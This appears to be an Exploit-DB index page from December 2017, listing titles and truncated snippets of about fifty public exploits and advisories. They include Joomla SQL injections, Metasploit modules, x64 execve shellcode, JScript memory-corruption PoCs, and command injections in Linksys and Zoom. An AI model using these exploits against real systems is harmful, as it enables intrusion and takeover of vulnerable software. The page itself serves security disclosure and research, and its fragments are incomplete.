Microsoft Windows - 'jscript!RegExpComp::Compile' Heap Overflow Through IE or Local Network via WPAD

var s = 'a'; forvar i=0;i !-- ============================================...

Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)

Linux/x64 - Custom Encoded XOR + Polymorphic + execve/bin/sh Shellcode Generator. Shellcode exploit for Generator platform !/usr/bin/python from random import randint encoded = "" encoded2 = "" badchars = 0x00 shellcode = "\x90" +...

Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection

Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection Dork: N/A Date: 19.12.2017 Vendor Homepage: hhttp://nextgeneditor.com/ Software Link: https://extensions.joomla.org/extension/nextgen-editor/ Software Download:...

Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control

Trend Micro Smart Protection Server Multiple Vulnerabilities 1. Advisory Information Title:: Trend Micro Smart Protection Server Multiple Vulnerabilities Advisory ID: CORE-2017-0008 Advisory URL: http://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilities...

Intel Content Protection HECI Service - Type Confusion Privilege Escalation

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1358 Intel Content Protection HECI Service Type Confusion EoP Platform: Tested on Windows 10, service version 9.0.2.117 Class: Elevation of Privilege Summary: The Intel Content Protection HECI Service exposes a DCOM object to all...

Microsoft Windows - 'jscript!JsArraySlice' Uninitialized Variable

var x = new URIErrornew Array, undefined, undefined; String.prototype.localeCompare.callx, new Date0, 0, 0, 0, 0, 0, undefined; Array.prototype.slice.call1; !-- ============================================ Technical details: The issue is in jscript!JsArraySlice Array.prototype.slice.call in the P...

Microsoft Windows - 'jscript!NameTbl::GetValDef' Use-After-Free

var vars = new Array100; forvar i=0;i !-- ============================================ PoC for WPAD might require page heap to trigger the crash: ============================================ function FindProxyForURLurl,...

Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read

function go var r= new RegExpArray100.join''; ''.searchr; alertRegExp.lastParen; go; r rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063 rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0 rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148 r8=00000000130f9210...

Zoom Linux Client 2.0.106600.0904 - Command Injection

CONVISO-17-003 - Zoom Linux Client Command Injection Vulnerability RCE 1. Advisory Information Conviso Advisory ID: CONVISO-17-003 CVE ID: CVE-2017-15049 CVSS v2: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C Date: 2017-10-01 2. Affected Components Zoom client for Linux, version 2.0.106600.0904 zoomamd64.deb...

Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection

Exploit Title: Cells Blog 3.5 - SQL Injection Dork: N/A Date: 16.12.2017 Vendor Homepage: http://www.cells.tw/ Software Link: http://www.cells.tw/cells/ Version: 3.5 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsan Sencan Author Web: http://ihsan.net Author Social:...

Joomla! Component User Bench 1.0 - 'userid' SQL Injection

Exploit Title: Joomla! Component User Bench 1.0 - SQL Injection Dork: N/A Date: 18.12.2017 Vendor Homepage: http://www.gegabyte.org/ Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/user-bench/ Version: 1.0 Category: Webapps Tested on:...

Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'HEAD', :uri = '/web/', :pattern = /Apache/ include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initializeinfo=...

GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution

!/usr/bin/python GoAhead httpd/2.5 to 3.6.5 LDPRELOAD remote code execution exploit EDB Note: Payloads https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43360.zip EDB Note: Source https://www.elttam.com.au/blog/goahead/ EDB Note: Source...

Joomla! Component My Projects 2.0 - SQL Injection

Exploit Title: Joomla! Component My Projects 2.0 - SQL Injection Dork: N/A Date: 18.12.2017 Vendor Homepage: http://www.gegabyte.org/ Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/my-projects/ Version: 2.0 Category: Webapps Tested on:...

Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow (PoC)

CONVISO-17-002 - Zoom Linux Client Stack-based Buffer Overflow Vulnerability 1. Advisory Information Conviso Advisory ID: CONVISO-17-002 CVE ID: CVE-2017-15048 CVSS v2: 6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P Date: 2017-10-01 2. Affected Components Zoom client for Linux, version 2.0.106600.0904...

Outlook for Android - Attachment Download Directory Traversal

''' There is a directory traversal issue in attachment downloads in Outlook for Android. There is no path sanitization on the attachment filename in the app. If the email account is a Hotmail account, this will be sanitized by the server, but for other accounts it will not be. This allows a file ...

CDex 1.96 - Buffer Overflow (PoC)

!/usr/bin/python Exploit Author: bzyo Twitter: @bzyo Exploit Title: CDex 1.96 - Local Stack Buffer Overflow Date: 17-12-2017 Vulnerable Software: CDex 1.96 Unicode Build Vendor Homepage: http://cdex.mu/ Version: v1.96 Software Link: http://cdex.mu/?q=download Tested On: Windows 7 x32 PoC: generat...

Joomla! Component Guru Pro - 'promocode' SQL Injection

Exploit Title: Joomla! Component Guru Pro 'promocode'- SQL Injection Dork: N/A Date: 17.12.2017 Vendor Homepage: https://www.ijoomla.com/ Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189 Version: N/A Category: Webapps Tested on:...

Ciuis CRM 1.0.7 - SQL Injection

Exploit Title: Ciuis CRM v 1.0.7 Sql Injection Google Dork: if applicable Date: 12/15/2017 Exploit Author: Zahid Abbasi Contact: http://twitter.com/zahidsec Website: http://zahidabbasi.com Vendor Homepage: http://ciuis.com/ Software Link: https://codecanyon.net/item/ciuis-crm/20473489 Version:...

Joomla! Component JB Visa 1.0 - 'visatype' SQL Injection

Exploit Title: Joomla! Component JB Visa 1.0 - SQL Injection Dork: N/A Date: 17.12.2017 Vendor Homepage: http://joombooking.com/ Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jb-visa/ Version: 1.0 Category: Webapps Tested on:...

Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution

Exploit Title: Monstra CMS - 3.0.4 RCE Vendor Homepage: http://monstra.org/ Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip Discovered by: Ishaq Mohammed Contact: https://twitter.com/securityprince Website: https://about.me/security-prince Category: webapps Platfor...

Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode

Linux/x64 - Custom Encoded XOR + execve/bin/sh Shellcode. Shellcode exploit for Linuxx86-64 platform global start section .text start: jmp findaddress ; jmp short by default decoder: ; Get the address of the string pop rdi push rdi pop rbx ; get the first byte and bruteforce till you get the toke...

Movie Guide 2.0 - SQL Injection

Exploit Title: Movie Guide 2.0 - SQL Injection Dork: N/A Date: 15.12.2017 Vendor Homepage: http://applebitemedia.com/ Software Link: http://applebitemedia.com/amwdl/AMMovieGuide.tar.gz Version: 2.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsan Sencan Author Web:...

Linux kernel < 4.10.15 - Race Condition Privilege Escalation

/ PoC for CVE-2017-10661, triggers UAF with KASan enabled in kernel 4.10 / include include include include include include include include include include include include include include include include include define RACETIME 1000000 int fd; int fddumb; int count=0; void listaddthreadvoid arg in...

ITGuard-Manager 0.0.0.1 - Remote Code Execution

Vulnerability Title: ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution Author: Nassim Asrir Contact: [email protected] / @asrirnassim CVE: Waiting ... CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P Vendor: http://www.innotube.co...

Sync Breeze 10.2.12 - Denial of Service

============================================= MGC ALERT 2017-007 - Original release date: November 30, 2017 - Last revised: December 14, 2017 - Discovered by: Manuel García Cárdenas - Severity: 7,5/10 CVSS Base Score - CVE-ID: CVE-2017-17088 ============================================= I...

Dup Scout Enterprise - 'Login' Buffer Overflow (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Dup Scout Enterprise Login Buffer Overflow', 'Description' = %q This module exploits a stack buffer overflow in Dup Scout Enterprise 10.0.18. The...

Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' = %q This module exploits a stack buffer overflow in...

pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Clickjacking Vulnerability In CSRF Error Page pfSense', 'Description' = %q This module exploits a Clickjacking vulnerability in pfSense 'Yorick...

Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection

Exploit Title: Paid To Read Script 2.0.5 - SQL Injection Dork: N/A Date: 13.12.2017 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/paid-to-read-script/ Version: 2.0.5 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: CVE-2017-17651...

Readymade Video Sharing Script 3.2 - HTML Injection

Exploit Title: Readymade Video Sharing Script 3.2 - HTML Injection Dork: N/A Date: 13.12.2017 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ Demo: http://www.smsemailmarketing.in/demo/videosharing/ Version: 3.2...

Microsoft Office - Dynamic Data Exchange 'DDE' Payload Delivery (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Microsoft Office DDE Payload Delivery', 'Description' = %q This module generates an DDE command to place within a word document, that when...

FS Lynda Clone 1.0 - SQL Injection

...

Linksys WVBR0 - 'User-Agent' Remote Command Injection

!/usr/bin/python -- coding: utf-8 -- Author: Nixawk CVE-2017-17411 Linksys WVBR0 25 Command Injection """ $ python2.7 exploit-CVE-2017-17411.py Usage: python exploit-CVE-2017-17411.py $ python2.7 exploit-CVE-2017-17411.py http://example.com/ + Target is exploitable by CVE-2017-17411 """ import...

Palo Alto Networks Firewalls - Root Remote Code Execution

This is a public advisory for CVE-2017-15944 which is a remote root code execution bug in Palo Alto Networks firewalls. Three separate bugs can be used together to remotely execute commands as root through the web management interface without authentication on: PAN-OS 6.1.18 and earlier, PAN-OS...

Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection

Exploit Title: Piwigo = 2.9.1 - 'cattrue'/'catfalse' SQL Injection Dork: N/A Date: 12.12.2017 Vendor Homepage: http://piwigo.org/ Software Link: http://piwigo.org/basics/downloads Version: = 2.9.1 Category: Webapps Tested on: WiN7x64/WIN10X64 CVE: CVE-2017-10682 Exploit Author: Akityo Email:...

Bus Booking Script 1.0 - 'txtname' SQL Injection

...

Multiple OEM - 'nsd' Remote Stack Format String (PoC)

STX Subject: Remote Stack Format String in 'nsd' binary from multiple OEM Attack vector: Remote Authentication: Anonymous no credentials needed Researcher: bashis December 2017 PoC: https://github.com/mcw0/PoC Release date: December 14, 2017 Full Disclosure: 0-Day - PoC - 1 $ curl...

Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection

Exploit Title: Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection Dork: N/A Date: 13.12.2017 Vendor Homepage: http://jextn.com/ Software Link: https://extensions.joomla.org/extensions/extension/communication/question-a-answers/jextn-question-and-answer/ Version: 3.1.0 Category:...

Joomla! Component JEXTN Video Gallery 3.0.5 - 'id' SQL Injection

Exploit Title: Joomla! Component JEXTN Video Gallery 3.0.5 - SQL Injection Dork: N/A Date: 13.12.2017 Vendor Homepage: http://jextn.com/ Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jextn-video-gallery/ Version: 3.0.5 Category: Webapps Tested on:...

Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read

Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read Author: Jakub Palaczynski CVE: CVE-2017-16787 Exploit tested on: ================== Meinberg LANTIME Web Configuration Utility 6.16.008 Vulnerability affects: ====================== All LTOS6 firmware releases before 6.24.004...

GNU C Library Dynamic Loader glibc ld.so - Memory Leak / Buffer Overflow

Qualys Security Advisory Buffer overflow in glibc's ld.so ======================================================================== Contents ======================================================================== Summary Memory Leak Buffer Overflow Exploitation Acknowledgments...

vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion

SSD Advisory – vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion Source: https://blogs.securiteam.com/index.php/archives/3573 Vulnerability Summary The following advisory describes a unauthenticated deserialization vulnerability that leads to arbitrary delete files and, unde...

vBulletin 5.x - 'routestring' Remote Code Execution

SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution Source: https://blogs.securiteam.com/index.php/archives/3569 Vulnerability Summary The following advisory describes a unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin...

Accesspress Anonymous Post Pro < 3.2.0 - Arbitrary File Upload

Exploit Title: Unauthenticated Arbitrary File Upload Date: November 12, 2017 Exploit Author: Colette Chamberland Author contact: [email protected] Author homepage: https://defiant.com Vendor Homepage: https://accesspressthemes.com/ Software Link:...

Vivotek IP Cameras - Remote Stack Overflow (PoC)

STX Subject: Vivotek IP Cameras - Remote Stack Overflow Researcher: bashis September-October 2017 PoC: https://github.com/mcw0/PoC Release date: November 13, 2017 Full Disclosure: 43 days Attack Vector: Remote Authentication: Anonymous no credentials needed Firmware Vulnerable: Only 2017 versions...

Apple XNU Kernel - Memory Corruption due to Integer Overflow in __offsetof Usage in posix_spawn on 32-bit Platforms

posixspawn is a complex syscall which takes a lot of arguments from userspace. The third argument is a pointer to a further arguments descriptor in userspace with the following structure on 32-bit: struct user32posixspawnargsdesc uint32t attrsize; / size of attributes block / uint32t attrp; /...

Joomla! Component JBuildozer 1.4.1 - 'appid' SQL Injection

Exploit Title: Joomla! Component JBuildozer 1.4.1 - SQL Injection Dork: N/A Date: 12.12.2017 Vendor Homepage: http://jbuildozer.com/ Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-construction/jbuildozer/ Version: 1.4.1 Category: Webapps Tested on:...

Apple macOS/iOS - Multiple Kernel Use-After-Frees due to Incorrect IOKit Object Lifetime Management in IOTimeSyncClockManagerUserClient

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1377 IOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService. IOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor...

Apple macOS - Kernel Code Execution due to Lack of Bounds Checking in AppleIntelCapriController::GetLinkConfig

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1375 AppleIntelCapriController::GetLinkConfig trusts a user-supplied value in the structure input which it uses to index a small table of pointers without bounds checking. The OOB-read pointer is passed to...